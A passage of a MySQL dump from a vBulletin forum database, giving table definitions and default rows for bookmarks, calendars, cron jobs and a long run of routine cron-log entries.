`minimumposts` int(10) unsigned NOT NULL DEFAULT '0',
`avatarpath` varchar(100) NOT NULL DEFAULT '',
`imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`avatarid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `bbcode`;
CREATE TABLE `bbcode` (
`bbcodeid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`bbcodetag` varchar(200) NOT NULL DEFAULT '',
`bbcodereplacement` mediumtext,
`bbcodeexample` varchar(200) NOT NULL DEFAULT '',
`bbcodeexplanation` mediumtext,
`twoparams` smallint(6) NOT NULL DEFAULT '0',
`title` varchar(100) NOT NULL DEFAULT '',
`buttonimage` varchar(250) NOT NULL DEFAULT '',
`options` int(10) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`bbcodeid`),
UNIQUE KEY `uniquetag` (`bbcodetag`,`twoparams`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `bookmarksite`;
CREATE TABLE `bookmarksite` (
`bookmarksiteid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`iconpath` varchar(250) NOT NULL DEFAULT '',
`active` smallint(5) unsigned NOT NULL DEFAULT '0',
`displayorder` int(10) unsigned NOT NULL DEFAULT '0',
`url` varchar(250) NOT NULL DEFAULT '',
`utf8encode` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`bookmarksiteid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `bookmarksite` (`bookmarksiteid`, `title`, `iconpath`, `active`, `displayorder`, `url`, `utf8encode`) VALUES
(1, 'Digg', 'bookmarksite_digg.gif', 1, 10, 'http://digg.com/submit?phase=2&url={URL}&title={TITLE}', 0),
(2, 'del.icio.us', 'bookmarksite_delicious.gif', 1, 20, 'http://del.icio.us/post?url={URL}&title={TITLE}', 0),
(3, 'StumbleUpon', 'bookmarksite_stumbleupon.gif', 1, 30, 'http://www.stumbleupon.com/submit?url={URL}&title={TITLE}', 0),
(4, 'Google', 'bookmarksite_google.gif', 1, 40, 'http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk={URL}&title={TITLE}', 0);
DROP TABLE IF EXISTS `calendar`;
CREATE TABLE `calendar` (
`calendarid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL DEFAULT '',
`description` varchar(100) NOT NULL DEFAULT '',
`displayorder` smallint(6) NOT NULL DEFAULT '0',
`neweventemail` text,
`moderatenew` smallint(6) NOT NULL DEFAULT '0',
`startofweek` smallint(6) NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '0',
`cutoff` smallint(5) unsigned NOT NULL DEFAULT '0',
`eventcount` smallint(5) unsigned NOT NULL DEFAULT '0',
`birthdaycount` smallint(5) unsigned NOT NULL DEFAULT '0',
`startyear` smallint(5) unsigned NOT NULL DEFAULT '2000',
`endyear` smallint(5) unsigned NOT NULL DEFAULT '2006',
`holidays` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`calendarid`),
KEY `displayorder` (`displayorder`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `calendar` (`calendarid`, `title`, `description`, `displayorder`, `neweventemail`, `moderatenew`, `startofweek`, `options`, `cutoff`, `eventcount`, `birthdaycount`, `startyear`, `endyear`, `holidays`) VALUES
(1, 'Default Calendar', '', 1, 'a:0:{}', 0, 1, 631, 40, 4, 4, 2012, 2018, 0);
DROP TABLE IF EXISTS `calendarcustomfield`;
CREATE TABLE `calendarcustomfield` (
`calendarcustomfieldid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`calendarid` int(10) unsigned NOT NULL DEFAULT '0',
`title` varchar(255) NOT NULL DEFAULT '',
`description` mediumtext,
`options` mediumtext,
`allowentry` smallint(6) NOT NULL DEFAULT '1',
`required` smallint(6) NOT NULL DEFAULT '0',
`length` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`calendarcustomfieldid`),
KEY `calendarid` (`calendarid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `calendarmoderator`;
CREATE TABLE `calendarmoderator` (
`calendarmoderatorid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`calendarid` int(10) unsigned NOT NULL DEFAULT '0',
`neweventemail` smallint(6) NOT NULL DEFAULT '0',
`permissions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`calendarmoderatorid`),
KEY `userid` (`userid`,`calendarid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `calendarpermission`;
CREATE TABLE `calendarpermission` (
`calendarpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`calendarid` int(10) unsigned NOT NULL DEFAULT '0',
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`calendarpermissions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`calendarpermissionid`),
KEY `calendarid` (`calendarid`),
KEY `usergroupid` (`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `cpsession`;
CREATE TABLE `cpsession` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`hash` varchar(32) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`hash`)
) ENGINE=MEMORY DEFAULT CHARSET=latin1;
INSERT INTO `cpsession` (`userid`, `hash`, `dateline`) VALUES
(100, '86642d62ef8086f5c7f8b335c2f605d4', 1465233553);
DROP TABLE IF EXISTS `cron`;
CREATE TABLE `cron` (
`cronid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`nextrun` int(10) unsigned NOT NULL DEFAULT '0',
`weekday` smallint(6) NOT NULL DEFAULT '0',
`day` smallint(6) NOT NULL DEFAULT '0',
`hour` smallint(6) NOT NULL DEFAULT '0',
`minute` varchar(100) NOT NULL DEFAULT '',
`filename` char(50) NOT NULL DEFAULT '',
`loglevel` smallint(6) NOT NULL DEFAULT '0',
`active` smallint(6) NOT NULL DEFAULT '1',
`varname` varchar(100) NOT NULL DEFAULT '',
`volatile` smallint(5) unsigned NOT NULL DEFAULT '0',
`product` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`cronid`),
UNIQUE KEY `varname` (`varname`),
KEY `nextrun` (`nextrun`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `cron` (`cronid`, `nextrun`, `weekday`, `day`, `hour`, `minute`, `filename`, `loglevel`, `active`, `varname`, `volatile`, `product`) VALUES
(1, 1465272060, -1, -1, 0, 'a:1:{i:0;i:1;}', './includes/cron/birthday.php', 1, 1, 'birthday', 1, 'vbulletin'),
(2, 1465235760, -1, -1, -1, 'a:1:{i:0;i:56;}', './includes/cron/threadviews.php', 0, 1, 'threadviews', 1, 'vbulletin'),
(3, 1465233900, -1, -1, -1, 'a:1:{i:0;i:25;}', './includes/cron/promotion.php', 1, 1, 'promotion', 1, 'vbulletin'),
(4, 1465272120, -1, -1, 0, 'a:1:{i:0;i:2;}', './includes/cron/digestdaily.php', 1, 1, 'digestdaily', 1, 'vbulletin'),
(5, 1465792200, 1, -1, 0, 'a:1:{i:0;i:30;}', './includes/cron/digestweekly.php', 1, 1, 'digestweekly', 1, 'vbulletin'),
(6, 1465272120, -1, -1, 0, 'a:1:{i:0;i:2;}', './includes/cron/subscriptions.php', 1, 1, 'subscriptions', 1, 'vbulletin'),
(7, 1465232700, -1, -1, -1, 'a:1:{i:0;i:5;}', './includes/cron/cleanup.php', 0, 1, 'cleanup', 1, 'vbulletin'),
(8, 1465233000, -1, -1, -1, 'a:1:{i:0;i:10;}', './includes/cron/attachmentviews.php', 0, 1, 'attachmentviews', 1, 'vbulletin'),
(9, 1465272180, -1, -1, 0, 'a:1:{i:0;i:3;}', './includes/cron/activate.php', 1, 1, 'activate', 1, 'vbulletin'),
(10, 1465233300, -1, -1, -1, 'a:1:{i:0;i:15;}', './includes/cron/removebans.php', 1, 1, 'removebans', 1, 'vbulletin'),
(11, 1465233600, -1, -1, -1, 'a:1:{i:0;i:20;}', './includes/cron/cleanup2.php', 0, 1, 'cleanup2', 1, 'vbulletin'),
(12, 1465272000, -1, -1, 0, 'a:1:{i:0;i:0;}', './includes/cron/stats.php', 0, 1, 'stats', 1, 'vbulletin'),
(13, 1465233900, -1, -1, -1, 'a:2:{i:0;i:25;i:1;i:55;}', './includes/cron/reminder.php', 0, 1, 'reminder', 1, 'vbulletin'),
(14, 1465272600, -1, -1, 0, 'a:1:{i:0;i:10;}', './includes/cron/dailycleanup.php', 0, 1, 'dailycleanup', 1, 'vbulletin'),
(15, 1465233600, -1, -1, -1, 'a:2:{i:0;i:20;i:1;i:50;}', './includes/cron/infractions.php', 1, 1, 'infractions', 1, 'vbulletin'),
(16, 1465233000, -1, -1, -1, 'a:1:{i:0;i:10;}', './includes/cron/ccbill.php', 1, 1, 'ccbill', 1, 'vbulletin'),
(17, 1465233600, -1, -1, -1, 'a:6:{i:0;i:0;i:1;i:10;i:2;i:20;i:3;i:30;i:4;i:40;i:5;i:50;}', './includes/cron/rssposter.php', 1, 1, 'rssposter', 1, 'vbulletin');
DROP TABLE IF EXISTS `cronlog`;
CREATE TABLE `cronlog` (
`cronlogid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`varname` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`description` mediumtext,
`type` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`cronlogid`),
KEY `varname` (`varname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `cronlog` (`cronlogid`, `varname`, `dateline`, `description`, `type`) VALUES
(1, 'digestdaily', 1420392891, '', 1),
(2, 'subscriptions', 1420392893, '', 1),
(3, 'digestweekly', 1420393486, '', 1),
(4, 'digestdaily', 1420448180, '', 1),
(5, 'subscriptions', 1420448196, '', 1),
(6, 'digestweekly', 1420448373, '', 1),
(7, 'digestdaily', 1420533199, '', 1),
(8, 'subscriptions', 1420533215, '', 1),
(9, 'digestdaily', 1420607029, '', 1),
(10, 'subscriptions', 1420607050, '', 1),
(11, 'digestdaily', 1420697428, '', 1),
(12, 'subscriptions', 1420697444, '', 1),
(13, 'digestdaily', 1420806457, '', 1),
(14, 'subscriptions', 1420806578, '', 1),
(15, 'digestdaily', 1420874848, '', 1),
(16, 'subscriptions', 1420880780, '', 1),
(17, 'digestdaily', 1420977077, '', 1),
(18, 'subscriptions', 1420977079, '', 1),
(19, 'digestdaily', 1421049745, '', 1),
(20, 'subscriptions', 1421049747, '', 1),
(21, 'digestweekly', 1421049784, '', 1),
(22, 'digestdaily', 1421131094, '', 1),
(23, 'subscriptions', 1421131099, '', 1),
(24, 'digestdaily', 1421223505, '', 1),
(25, 'subscriptions', 1421223668, '', 1),
(26, 'digestdaily', 1421306759, '', 1),
(27, 'subscriptions', 1421306774, '', 1),
(28, 'digestdaily', 1421421867, '', 1),
(29, 'subscriptions', 1421421882, '', 1),
(30, 'digestdaily', 1421495459, '', 1),
(31, 'subscriptions', 1421495463, '', 1),
(32, 'digestdaily', 1421680581, '', 1),
(33, 'subscriptions', 1421680586, '', 1),
(34, 'digestweekly', 1421680588, '', 1),
(35, 'digestdaily', 1421739019, '', 1),
(36, 'subscriptions', 1421739105, '', 1),
(37, 'digestdaily', 1421828056, '', 1),
(38, 'subscriptions', 1421828084, '', 1),
(39, 'digestdaily', 1421916822, '', 1),
(40, 'subscriptions', 1421917922, '', 1),
(41, 'digestdaily', 1422004695, '', 1),
(42, 'subscriptions', 1422004700, '', 1),
(43, 'digestdaily', 1422107851, '', 1),
(44, 'subscriptions', 1422107924, '', 1),
(45, 'digestdaily', 1422202470, '', 1),
(46, 'subscriptions', 1422202475, '', 1),
(47, 'digestdaily', 1422256454, '', 1),
(48, 'subscriptions', 1422256456, '', 1),
(49, 'digestweekly', 1422256881, '', 1),
(50, 'digestdaily', 1424893128, '', 1),
(51, 'subscriptions', 1424893397, '', 1),
(52, 'digestweekly', 1424894144, '', 1),
(53, 'digestdaily', 1424954172, '', 1),
(54, 'subscriptions', 1424954191, '', 1),
(55, 'digestdaily', 1425036828, '', 1),
(56, 'subscriptions', 1425036856, '', 1),
(57, 'digestdaily', 1425151014, '', 1),
(58, 'subscriptions', 1425151018, '', 1),
(59, 'digestdaily', 1425204648, '', 1),
(60, 'subscriptions', 1425204668, '', 1),
(61, 'digestdaily', 1425276839, '', 1),
(62, 'subscriptions', 1425277915, '', 1),
(63, 'digestweekly', 1425277959, '', 1),
(64, 'digestdaily', 1425347642, '', 1),
(65, 'subscriptions', 1425352680, '', 1),
(66, 'digestdaily', 1425452228, '', 1),
(67, 'subscriptions', 1425457473, '', 1),
(68, 'digestdaily', 1425542799, '', 1),
(69, 'subscriptions', 1425542802, '', 1),
(70, 'digestdaily', 1425655152, '', 1),
(71, 'subscriptions', 1425658545, '', 1),
(72, 'digestdaily', 1425686683, '', 1),
(73, 'subscriptions', 1425686693, '', 1),
(74, 'digestdaily', 1425781647, '', 1),
(75, 'subscriptions', 1425781701, '', 1),
(76, 'digestdaily', 1425910377, '', 1),
(77, 'subscriptions', 1425911056, '', 1),
(78, 'digestweekly', 1425918331, '', 1),
(79, 'digestdaily', 1425968643, '', 1),
(80, 'subscriptions', 1425968666, '', 1),
(81, 'digestdaily', 1426056577, '', 1),
(82, 'subscriptions', 1426056580, '', 1),
(83, 'digestdaily', 1426172110, '', 1),
(84, 'subscriptions', 1426172112, '', 1),
(85, 'digestdaily', 1426401092, '', 1),
(86, 'subscriptions', 1426401104, '', 1),
(87, 'digestdaily', 1426487371, '', 1),
(88, 'subscriptions', 1426487400, '', 1),
(89, 'digestweekly', 1426488343, '', 1),
(90, 'digestdaily', 1426547030, '', 1),
(91, 'subscriptions', 1426547709, '', 1),
(92, 'digestdaily', 1426660778, '', 1),
(93, 'subscriptions', 1426660785, '', 1),
(94, 'digestdaily', 1426779953, '', 1),
(95, 'subscriptions', 1426779977, '', 1),
(96, 'digestdaily', 1426899565, '', 1),
(97, 'subscriptions', 1426899573, '', 1),
(98, 'digestdaily', 1427046987, '', 1),
(99, 'subscriptions', 1427046991, '', 1),
(100, 'digestdaily', 1427110677, '', 1),
(101, 'subscriptions', 1427110712, '', 1),
(102, 'digestweekly', 1427110738, '', 1),
(103, 'digestdaily', 1427214886, '', 1),
(104, 'subscriptions', 1427214898, '', 1),
(105, 'digestdaily', 1427281797, '', 1),
(106, 'subscriptions', 1427283606, '', 1),
(107, 'digestdaily', 1427327189, '', 1),
(108, 'subscriptions', 1427327192, '', 1),
(109, 'digestdaily', 1427417156, '', 1),
(110, 'subscriptions', 1427417160, '', 1),
(111, 'digestdaily', 1427498951, '', 1),
(112, 'subscriptions', 1427498952, '', 1),
(113, 'digestdaily', 1427588047, '', 1),
(114, 'subscriptions', 1427588049, '', 1),
(115, 'digestdaily', 1427673115, '', 1),
(116, 'subscriptions', 1427673196, '', 1),
(117, 'digestweekly', 1427678781, '', 1),
(118, 'digestdaily', 1427779394, '', 1),
(119, 'subscriptions', 1427779400, '', 1),
(120, 'digestdaily', 1427850736, '', 1),
(121, 'subscriptions', 1427850751, '', 1),
(122, 'digestdaily', 1427928891, '', 1),
(123, 'subscriptions', 1427929631, '', 1),
(124, 'digestdaily', 1428014266, '', 1),
(125, 'subscriptions', 1428014270, '', 1),
(126, 'digestdaily', 1428108955, '', 1),
(127, 'subscriptions', 1428108958, '', 1),
(128, 'digestdaily', 1428226675, '', 1),
(129, 'subscriptions', 1428236075, '', 1),
(130, 'digestdaily', 1428286970, '', 1),
(131, 'subscriptions', 1428287038, '', 1),
(132, 'digestweekly', 1428287232, '', 1),
(133, 'digestdaily', 1428366921, '', 1),
(134, 'subscriptions', 1428383005, '', 1),
(135, 'digestdaily', 1428489788, '', 1),
(136, 'subscriptions', 1428491444, '', 1),
(137, 'digestdaily', 1428557489, '', 1),
(138, 'subscriptions', 1428557498, '', 1),
(139, 'digestdaily', 1428678799, '', 1),
(140, 'subscriptions', 1428678800, '', 1),
(141, 'digestdaily', 1428715322, '', 1),
(142, 'subscriptions', 1428715330, '', 1),
(143, 'digestdaily', 1428888195, '', 1),
(144, 'subscriptions', 1428888207, '', 1),
(145, 'digestweekly', 1428888485, '', 1),
(146, 'digestdaily', 1428962814, '', 1),
(147, 'subscriptions', 1428962896, '', 1),
(148, 'digestdaily', 1429173181, '', 1),
(149, 'subscriptions', 1429184765, '', 1),
(150, 'digestdaily', 1429374675, '', 1),
(151, 'subscriptions', 1429374679, '', 1),
(152, 'digestdaily', 1429528030, '', 1),
(153, 'subscriptions', 1429528032, '', 1),
(154, 'digestweekly', 1429563532, '', 1),
(155, 'digestdaily', 1429571173, '', 1),
(156, 'subscriptions', 1429578711, '', 1),
(157, 'digestdaily', 1429691429, '', 1),
(158, 'subscriptions', 1429691441, '', 1),
(159, 'digestdaily', 1429831399, '', 1),
(160, 'subscriptions', 1429831401, '', 1),
(161, 'digestdaily', 1430037222, '', 1),
(162, 'subscriptions', 1430037222, '', 1),
(163, 'digestdaily', 1430293687, '', 1),
(164, 'subscriptions', 1430293689, '', 1),
(165, 'digestweekly', 1430298871, '', 1),
(166, 'digestdaily', 1430492329, '', 1),
(167, 'subscriptions', 1430492331, '', 1),
(168, 'digestdaily', 1430602362, '', 1),
(169, 'subscriptions', 1430602376, '', 1),
(170, 'digestdaily', 1430668257, '', 1),
(171, 'subscriptions', 1430668262, '', 1),
(172, 'digestdaily', 1430835730, '', 1),
(173, 'subscriptions', 1430835770, '', 1),
(174, 'digestweekly', 1430835782, '', 1),
(175, 'digestdaily', 1430985858, '', 1),
(176, 'subscriptions', 1430985873, '', 1),
(177, 'digestdaily', 1431166689, '', 1),
(178, 'subscriptions', 1431166692, '', 1),
(179, 'digestdaily', 1431341501, '', 1),
(180, 'subscriptions', 1431343350, '', 1),
(181, 'digestweekly', 1431343362, '', 1),
(182, 'digestdaily', 1431417920, '', 1),
(183, 'subscriptions', 1431417936, '', 1),
(184, 'digestdaily', 1431516755, '', 1),
(185, 'subscriptions', 1431516901, '', 1),
(186, 'digestdaily', 1431582747, '', 1),
(187, 'subscriptions', 1431582836, '', 1),
(188, 'digestdaily', 1431888460, '', 1),
(189, 'subscriptions', 1431888476, '', 1),
(190, 'digestdaily', 1431901829, '', 1),
(191, 'subscriptions', 1431901832, '', 1),
(192, 'digestweekly', 1431903180, '', 1),
(193, 'digestdaily', 1432022104, '', 1),
(194, 'subscriptions', 1432022133, '', 1),
(195, 'digestdaily', 1432153413, '', 1),
(196, 'subscriptions', 1432153441, '', 1),
(197, 'digestdaily', 1432207912, '', 1),
(198, 'subscriptions', 1432210819, '', 1),
(199, 'digestdaily', 1432357495, '', 1),
(200, 'subscriptions', 1432372214, '', 1),
(201, 'digestdaily', 1432503477, '', 1),
(202, 'subscriptions', 1432503514, '', 1),
(203, 'digestdaily', 1432551091, '', 1),
(204, 'subscriptions', 1432551190, '', 1),
(205, 'digestweekly', 1432655166, '', 1),
(206, 'digestdaily', 1432798953, '', 1),
(207, 'subscriptions', 1432798973, '', 1),
(208, 'digestdaily', 1432912395, '', 1),
(209, 'subscriptions', 1432912400, '', 1),
(210, 'digestdaily', 1433094811, '', 1),
(211, 'subscriptions', 1433094814, '', 1),
(212, 'digestdaily', 1433236884, '', 1),
(213, 'subscriptions', 1433236893, '', 1),
(214, 'digestweekly', 1433236906, '', 1),
(215, 'digestdaily', 1433393214, '', 1),
(216, 'subscriptions', 1433417774, '', 1),
(217, 'digestdaily', 1433637666, '', 1),
(218, 'subscriptions', 1433637686, '', 1),
(219, 'digestdaily', 1433851661, '', 1),
(220, 'subscriptions', 1433856506, '', 1),
(221, 'digestweekly', 1433891775, '', 1),
(222, 'digestdaily', 1434065385, '', 1),
(223, 'subscriptions', 1434065390, '', 1),
(224, 'digestdaily', 1434192002, '', 1),
(225, 'subscriptions', 1434199614, '', 1),
(226, 'subscriptions', 1434406107, '', 1),
(227, 'digestdaily', 1434414334, '', 1),
(228, 'digestweekly', 1434414351, '', 1),
(229, 'digestdaily', 1434801993, '', 1),
(230, 'subscriptions', 1434802010, '', 1),
(231, 'digestdaily', 1434983001, '', 1),
(232, 'subscriptions', 1434983026, '', 1),
(233, 'digestweekly', 1435157251, '', 1),
(234, 'digestdaily', 1435232947, '', 1),
(235, 'subscriptions', 1435251738, '', 1),
(236, 'digestdaily', 1435271351, '', 1),
(237, 'subscriptions', 1435271364, '', 1),
(238, 'digestdaily', 1435424200, '', 1),
(239, 'subscriptions', 1435424209, '', 1),
(240, 'digestdaily', 1435526110, '', 1),
(241, 'subscriptions', 1435526124, '', 1),
(242, 'digestdaily', 1435590584, '', 1),
(243, 'subscriptions', 1435590591, '', 1),
(244, 'digestweekly', 1435591181, '', 1),
(245, 'digestdaily', 1435620832, '', 1),
(246, 'subscriptions', 1435620833, '', 1),
(247, 'digestdaily', 1435711813, '', 1),
(248, 'subscriptions', 1435711831, '', 1),
(249, 'digestdaily', 1435789772, '', 1),
(250, 'subscriptions', 1435793769, '', 1),
(251, 'digestdaily', 1435910770, '', 1),
(252, 'subscriptions', 1435910775, '', 1),
(253, 'digestdaily', 1436015036, '', 1),
(254, 'subscriptions', 1436015038, '', 1),
(255, 'digestdaily', 1436095961, '', 1),
(256, 'subscriptions', 1436095970, '', 1),
(257, 'digestdaily', 1436146392, '', 1),
(258, 'subscriptions', 1436146415, '', 1),
(259, 'digestweekly', 1436152733, '', 1),
(260, 'digestdaily', 1436222597, '', 1),
(261, 'subscriptions', 1436222600, '', 1),
(262, 'digestdaily', 1436335488, '', 1),
(263, 'subscriptions', 1436335489, '', 1),
(264, 'digestdaily', 1436405053, '', 1),
(265, 'subscriptions', 1436405072, '', 1),
(266, 'digestdaily', 1436519050, '', 1),
(267, 'subscriptions', 1436519051, '', 1),
(268, 'digestdaily', 1436572167, '', 1),
(269, 'subscriptions', 1436572183, '', 1),
(270, 'digestdaily', 1436748432, '', 1),
(271, 'subscriptions', 1436770344, '', 1),
(272, 'digestweekly', 1436793310, '', 1),
(273, 'digestdaily', 1436888568, '', 1),
(274, 'subscriptions', 1436896651, '', 1),
(275, 'digestdaily', 1436966365, '', 1),
(276, 'subscriptions', 1436976272, '', 1),
(277, 'digestdaily', 1437011756, '', 1),
(278, 'subscriptions', 1437011787, '', 1),
(279, 'digestdaily', 1437121058, '', 1),
(280, 'subscriptions', 1437123611, '', 1),
(281, 'digestdaily', 1437266501, '', 1),
(282, 'subscriptions', 1437266508, '', 1),
(283, 'digestdaily', 1437423862, '', 1),
(284, 'subscriptions', 1437423865, '', 1),
(285, 'digestweekly', 1437423914, '', 1),
(286, 'digestdaily', 1437557114, '', 1),
(287, 'subscriptions', 1437557163, '', 1),
(288, 'digestdaily', 1437629303, '', 1),
(289, 'subscriptions', 1437629341, '', 1),
(290, 'digestdaily', 1437749126, '', 1),
(291, 'subscriptions', 1437749143, '', 1),
(292, 'digestdaily', 1437846275, '', 1),
(293, 'subscriptions', 1437846280, '', 1),
(294, 'digestdaily', 1437989704, '', 1),
(295, 'subscriptions', 1437989719, '', 1),
(296, 'digestweekly', 1438099720, '', 1),
(297, 'birthday', 1438106755, 'SADAB', 1),
(298, 'digestdaily', 1438106767, '', 1),
(299, 'subscriptions', 1438107771, '', 1),
(300, 'digestdaily', 1438151360, '', 1),
(301, 'subscriptions', 1438151364, '', 1),
(302, 'digestdaily', 1438229979, '', 1),
(303, 'subscriptions', 1438232705, '', 1),
(304, 'digestdaily', 1438341047, '', 1),
(305, 'subscriptions', 1438341049, '', 1),
(306, 'digestdaily', 1438432055, '', 1),
(307, 'subscriptions', 1438432172, '', 1),
(308, 'digestdaily', 1438509784, '', 1),
(309, 'subscriptions', 1438509797, '', 1),
(310, 'digestdaily', 1438595861, '', 1),
(311, 'subscriptions', 1438600331, '', 1),
(312, 'digestweekly', 1438602171, '', 1),
(313, 'digestdaily', 1438676550, '', 1),
(314, 'subscriptions', 1438677171, '', 1),
(315, 'digestdaily', 1438734985, '', 1),
(316, 'subscriptions', 1438735040, '', 1),
(317, 'digestdaily', 1438821641, '', 1),
(318, 'subscriptions', 1438821642, '', 1),
(319, 'digestdaily', 1438936703, '', 1),
(320, 'subscriptions', 1438936706, '', 1),
(321, 'digestdaily', 1438988760, '', 1),
(322, 'subscriptions', 1438988765, '', 1),
(323, 'digestdaily', 1439071835, '', 1),
(324, 'subscriptions', 1439071842, '', 1),
(325, 'digestdaily', 1439158059, '', 1),
(326, 'subscriptions', 1439158069, '', 1),
(327, 'digestweekly', 1439159403, '', 1),
(328, 'digestdaily', 1439246742, '', 1),
(329, 'subscriptions', 1439246752, '', 1),
(330, 'digestdaily', 1439334082, '', 1),
(331, 'subscriptions', 1439334090, '', 1),
(332, 'digestdaily', 1439425582, '', 1),
(333, 'subscriptions', 1439425589, '', 1),
(334, 'digestdaily', 1439505016, '', 1),
(335, 'subscriptions', 1439506304, '', 1),
(336, 'digestdaily', 1439625703, '', 1),
(337, 'subscriptions', 1439628434, '', 1),
(338, 'digestdaily', 1439707596, '', 1),
(339, 'subscriptions', 1439707603, '', 1),
(340, 'digestdaily', 1439773391, '', 1),
(341, 'subscriptions', 1439773391, '', 1),
(342, 'digestweekly', 1439781531, '', 1),
(343, 'digestdaily', 1439850552, '', 1),
(344, 'subscriptions', 1439850556, '', 1),
(345, 'digestdaily', 1439937413, '', 1),
(346, 'subscriptions', 1439937709, '', 1),
(347, 'digestdaily', 1440022152, '', 1),
(348, 'subscriptions', 1440022298, '', 1),
(349, 'digestdaily', 1440108333, '', 1),
(350, 'subscriptions', 1440108339, '', 1),
(351, 'digestdaily', 1440214652, '', 1),
(352, 'subscriptions', 1440226441, '', 1),
(353, 'digestdaily', 1440284148, '', 1),
(354, 'subscriptions', 1440284155, '', 1),
(355, 'digestdaily', 1440367909, '', 1),
(356, 'subscriptions', 1440367956, '', 1),
(357, 'digestweekly', 1440374357, '', 1),
(358, 'digestdaily', 1440454410, '', 1),
(359, 'subscriptions', 1440454413, '', 1),
(360, 'digestdaily', 1440570708, '', 1),
(361, 'subscriptions', 1440570746, '', 1),
(362, 'digestdaily', 1440634273, '', 1),
(363, 'subscriptions', 1440634298, '', 1),
(364, 'digestdaily', 1440719796, '', 1),
(365, 'subscriptions', 1440719825, '', 1),
(366, 'digestdaily', 1440813023, '', 1),
(367, 'subscriptions', 1440813027, '', 1),
(368, 'digestdaily', 1440888106, '', 1),
(369, 'subscriptions', 1440888951, '', 1),
(370, 'digestdaily', 1440987131, '', 1),
(371, 'subscriptions', 1440987140, '', 1),
(372, 'digestweekly', 1441002865, '', 1),
(373, 'digestdaily', 1441059266, '', 1),
(374, 'subscriptions', 1441059267, '', 1),
(375, 'digestdaily', 1441147799, '', 1),
(376, 'subscriptions', 1441147800, '', 1),
(377, 'digestdaily', 1441233435, '', 1),
(378, 'subscriptions', 1441233444, '', 1),
(379, 'digestdaily', 1441323753, '', 1),
(380, 'subscriptions', 1441323754, '', 1),
(381, 'digestdaily', 1441420395, '', 1),
(382, 'subscriptions', 1441420404, '', 1),
(383, 'digestdaily', 1441493767, '', 1),
(384, 'subscriptions', 1441493768, '', 1),
(385, 'digestdaily', 1441614137, '', 1),
(386, 'subscriptions', 1441614137, '', 1),
(387, 'digestweekly', 1441619573, '', 1),
(388, 'digestdaily', 1441695094, '', 1),
(389, 'subscriptions', 1441696698, '', 1),
(390, 'digestdaily', 1441789985, '', 1),
(391, 'subscriptions', 1441789989, '', 1),
(392, 'digestdaily', 1441863258, '', 1),
(393, 'subscriptions', 1441863262, '', 1),
(394, 'digestdaily', 1441949343, '', 1),
(395, 'subscriptions', 1441949393, '', 1),
(396, 'digestdaily', 1442020927, '', 1),
(397, 'subscriptions', 1442020929, '', 1),
(398, 'digestdaily', 1442096687, '', 1),
(399, 'subscriptions', 1442097468, '', 1),
(400, 'digestdaily', 1442188785, '', 1),
(401, 'subscriptions', 1442191451, '', 1),
(402, 'digestweekly', 1442203086, '', 1),
(403, 'digestdaily', 1442269879, '', 1),
(404, 'subscriptions', 1442270809, '', 1),
(405, 'digestdaily', 1442396659, '', 1),
(406, 'subscriptions', 1442396665, '', 1),
(407, 'digestdaily', 1442443807, '', 1),
(408, 'subscriptions', 1442446747, '', 1),
(409, 'digestdaily', 1442528344, '', 1),
(410, 'subscriptions', 1442528362, '', 1),
(411, 'digestdaily', 1442615855, '', 1),
(412, 'subscriptions', 1442615863, '', 1),
(413, 'digestdaily', 1442701292, '', 1),
(414, 'subscriptions', 1442701293, '', 1),
(415, 'digestdaily', 1442787625, '', 1),
(416, 'subscriptions', 1442788240, '', 1),
(417, 'digestweekly', 1442790675, '', 1),
(418, 'digestdaily', 1442879212, '', 1),
(419, 'subscriptions', 1442879216, '', 1),
(420, 'digestdaily', 1442980541, '', 1),
(421, 'subscriptions', 1442980602, '', 1),
(422, 'digestdaily', 1443045797, '', 1),
(423, 'subscriptions', 1443045889, '', 1),
(424, 'digestdaily', 1443132964, '', 1),
(425, 'subscriptions', 1443133001, '', 1),
(426, 'digestdaily', 1443218643, '', 1),
(427, 'subscriptions', 1443219015, '', 1),
(428, 'digestdaily', 1443308205, '', 1),
(429, 'subscriptions', 1443308209, '', 1),
(430, 'digestdaily', 1443393546, '', 1),
(431, 'subscriptions', 1443393580, '', 1),
(432, 'digestweekly', 1443398379, '', 1),
